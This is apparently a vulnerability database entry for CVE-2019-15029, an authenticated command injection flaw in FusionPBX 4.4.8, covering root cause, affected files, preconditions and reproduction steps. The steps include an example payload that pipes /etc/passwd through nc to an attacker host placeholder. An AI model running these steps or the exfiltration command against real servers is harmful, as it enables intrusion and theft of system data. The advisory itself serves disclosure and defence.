CVE-2019-15029
Description
FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
FusionPBX 4.4.8 allows authenticated remote code execution via arbitrary command injection in service start command.
Vulnerability
FusionPBX version 4.4.8 contains a command injection vulnerability in the service management functionality. The /app/services/service_edit.php script accepts a POST parameter service_cmd_start which is intended for specifying a command to start a service. Although the parameter is passed through a check_str() function for basic filtering, it does not sufficiently sanitize the input to prevent injection of arbitrary system commands. The malicious command is stored in the database. Subsequently, the /app/services/services.php script retrieves the stored command and executes it when a GET request with a=start and the corresponding service ID is made. This allows an authenticated attacker to execute arbitrary system commands on the server [1][2].
Exploitation
An attacker must first obtain valid administrative credentials for the FusionPBX web interface. With authenticated access, the attacker sends a POST request to service_edit.php containing a crafted service_cmd_start value (e.g., a system command such as id > /tmp/out). The attacker then triggers execution by sending a GET request to services.php with the newly created service ID and the parameter a=start. No additional user interaction is required beyond the initial authentication [1][2].
Impact
Successful exploitation results in remote code execution with the privileges of the web server user (typically www-data). This allows the attacker to execute arbitrary commands, read or modify sensitive files, install backdoors, or pivot to internal networks. The compromise leads to full control of the FusionPBX server and potential data exfiltration or further lateral movement [1][2].
Mitigation
As of the publication date (2019-09-05), the vendor has not released an official patch for this vulnerability. Users of FusionPBX 4.4.8 should upgrade to a later version if available. Workarounds include restricting network access to the administrative interface, implementing strong authentication, and monitoring logs for suspicious service creation or execution attempts. This CVE is not listed in the CISA Known Exploited Vulnerabilities catalog [1][2].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- FusionPBX/FusionPBXdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing shell-command sanitization: the `check_str()` function only escapes SQL-special characters, and the stored `service_cmd_start` value is passed directly to `shell_exec()` without validation."
Attack vector
An authenticated attacker first sends a POST request to `service_edit.php` with a malicious `service_cmd_start` value (e.g., a reverse shell command). The `check_str()` function escapes SQL-special characters but does not sanitize shell metacharacters, so the payload is stored verbatim in the `v_services` table [ref_id=1]. The attacker then sends a GET request to `services.php` with the service UUID as the `id` parameter and `a=start`. The script retrieves the stored `service_cmd_start` from the database and passes it to `shell_exec()`, executing the attacker's command on the operating system [ref_id=1].
Affected code
The vulnerability resides in `/app/services/services.php` (lines ~76–102) and `/app/services/service_edit.php` (line ~56). In `services.php`, the `service_cmd_start` and `service_cmd_stop` values are fetched from the database and passed directly to `shell_exec()` without sanitization [ref_id=1]. In `service_edit.php`, the POST parameter `service_cmd_start` is accepted and stored into the database after only SQL-escaping via `check_str()`, which does not filter shell metacharacters [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory [ref_id=1] identifies the root cause as the lack of shell-command sanitization: `check_str()` only prevents SQL injection but does not filter shell metacharacters, and `shell_exec()` is called with user-controlled database values. The recommended remediation would be to validate that `service_cmd_start` and `service_cmd_stop` contain only expected, safe commands (e.g., a whitelist of allowed service binaries) and to avoid passing arbitrary user-supplied strings to `shell_exec()`.
Preconditions
- authAttacker must have valid FusionPBX user credentials (authenticated session).
- networkAttacker must be able to reach the FusionPBX web interface over the network.
- configThe application must be configured with a database backend (MySQL, PostgreSQL, or SQLite) — no special DB config required.
- inputAttacker supplies arbitrary shell commands via the `service_cmd_start` POST parameter.
Reproduction
1. Log in to FusionPBX with valid credentials. 2. Send a POST request to `/app/services/service_edit.php` with `service_name`, `service_type`, `service_data`, `service_cmd_start` (containing the malicious command, e.g., `cat /etc/passwd | nc ATTACKER_IP ATTACKER_PORT`), `service_cmd_stop`, `service_description`, and `submit=Save`. 3. Retrieve the service UUID from the response or by parsing the services list page. 4. Send a GET request to `/app/services/services.php?id=<SERVICE_UUID>&a=start`. The command stored in `service_cmd_start` executes on the server.
Full Python exploit code is provided in [ref_id=2].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- drive.google.com/file/d/1bt08NSUaxu87LJJGdNd7LpvZ2uGauRK8/viewmitrex_refsource_MISC
- gist.github.com/mhaskar/7a6a804cd68c7fec4f9d1f5c3507900fmitrex_refsource_MISC
- shells.systems/fusionpbx-v4-4-8-authenticated-remote-code-execution-cve-2019-15029/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.